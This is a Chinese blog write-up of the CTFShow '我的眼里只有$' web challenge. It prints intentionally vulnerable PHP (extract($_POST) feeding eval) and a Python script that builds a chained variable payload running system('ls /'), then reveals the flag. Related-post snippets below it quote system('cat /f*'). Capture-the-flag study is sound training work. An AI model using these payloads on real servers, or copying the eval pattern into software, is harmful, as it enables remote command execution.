WEB-CTFShow-菜狗杯-我的眼里只有$

最新推荐文章于 2025-03-13 20:03:38 发布
最新推荐文章于 2025-03-13 20:03:38 发布
阅读量1.5k 收藏 2
点赞数 2
CC 4.0 BY-SA版权
分类专栏: WEB CTF 参数传递 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_31415417/article/details/128519728
文章讲述了在CTFshow-菜狗杯竞赛中,选手需解决一个涉及$符号多重取值的题目。通过分析源码,发现需要构造36层取值的payload,最终成功执行系统命令读取文件列表,找到名为f1agaaa的文件,从而获得flag。提供的Python代码展示了如何构建payload来读取文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目来源

CTFshow-菜狗杯

考点

$的多重取值

题目源码

error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);

解题思路

通过阅读源码,我们可以发现共有36个$符号,也就是说需要构造36层取值,且第一层必须是’_’


Payload

我们采用python代码构造payload,读取文件列表

import string
a='_=a&'
s=string.ascii_letters
code="system('ls /');"
for i in range(35):
    a+=s[i]+"="+s[i+1]+"&"
a+=s[i]+"="+code
print(a)

_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=J&I=system(‘ls /’);

在这里插入图片描述

看到列表中有个 f1agaaa文件很可以,

构造新的读取文件命令

在这里插入图片描述

得到flag

ctfshow{50e58443-4cae-41a5-99bd-e9b62828fdcd}

ctfshow-菜狗-WEB-wp
F1rstb100d
11-14 1676
ctfshow-菜狗-WEB-wp
2024年网安最新ctfshow-WEB-web11( 利用session绕过登录验证)_ctfshow web11
2401_84297796的博客
05-03 640
ctf.show WEB模块第11关用session中保存的密码进行登录验证, 将 session中保存的密码清空即可绕过页面中直接给了源码, 很明显是让我们进行代码审计, 源码中将我们输入的密码与 session中保存的密码进行匹配, 两个password相同即可登录成功。
ctfshow 我的眼里只有$
最新发布
2402_87115692的博客
03-13 218
可以看到就是个变量覆盖然后再无限套娃。
CTFshow-菜狗-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗-WEB-变量循环取值-我的眼里只有$
ctfshow菜狗 web 我的眼里只有$
hypocrite2的博客
05-12 525
load URL、post data打钩、把输出的填空。我先a-z,在A-I,一共26+9 =35个,我这里最后是给I赋值。#这里cat /f1agaaa是打开f1agaaa文件的命令,不懂。生成从变量1到变量35,最后赋给变量35的值为真正想执行的命令。题目有36个$,给出的最后一个$_可以看做变量0。查看目录有一个f1agaaa文件。#这里ls是查看目录文件的命令。#下载未收费的hackbar。#为什么要_=a开头?萌新入坑,防懒细胞滋生。hackbar,混过。
菜狗Web_我眼里只有$wp
Altering_Ji的博客
11-18 878
菜狗Web题我眼里只有$wp
CTFSHOW菜狗 web
羽的博客
11-13 9695
CTFSHOW web
CTF秀--菜狗
m0_59022585的博客
07-09 5455
再使$_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]=system("cat /f*"),查看f开头的文件内容。令_GET=a,则有:$key=_GET,$value=a,有:$$key=$_GET=$$value=$a,可知使用GET传入_GET=flag可以得到flag。令cookie中传入CTFshow-QQ群:=a,则有$_POST['a'],令post中传入a=b,则有$_GET['b']。
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow菜狗web
09-07
ctfshow菜狗web是一个CTF比赛中的一个项目,其中包含了多个题目和挑战。其中有一个题目叫做"web2 c0me_t0_s1gn",这是一个需要进行签到的题目。 在这个题目中,源码中没有对number2进行正则匹配校验,所以number2...
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 477
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
ctfshow(菜狗
qq_62046696的博客
11-28 6718
这样的话cookie传入 =a ,然后破石头 a=b ,get b=c,request可以接收post和get请求,最后c因为用数组传参所以要带上后面的东西。这道题其实,看if($arr[]=1)这个等于号,是一个所以这是一个赋值的操作,肯定为true会进行die的操作,所以0=1随便赋值。然后input=加密传参,action=test,但是这里一直没成功,弄了好久才发现+被过滤掉了,需要一层的url 编码。的个数,%4e这样的形式只占用一个字节,是统计 a=%4e统计等号的右边。
CTFshow 菜狗 web方向 全
Jay17的博客
09-01 5591
CTFshow 菜狗 web方向 全
ctfshow菜狗】wp
leekos的博客,分享web安全相关知识~
03-07 2737
ctfshow菜狗】wp
ctfshow菜狗wp
m0_62274649的博客
11-17 2937
菜狗wp
【ctf.show-web赛题】
一纸荒芜的博客
03-21 3580
主要分享自己做题的心得和积累,共勉之。
ctfshow菜狗】misc
leekos的博客,分享web安全相关知识~
03-13 3200
ctfshow菜狗】misc
CTFshow-菜狗-web签到
qq_31415417的博客
12-06 3685
CTFshow参数传递的获取、url编码、eval命令执行 解题思路 先是cookie传参再是POST传参再是GET传参再是REQUEST传参最后是eval命令执行分析链接https://note.youdao.com/ynoteshare/index.html?id=def831ca8bef3926b1cb0e62249d6e88&type=note&_time=1670206729016构造payload 得到flag
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值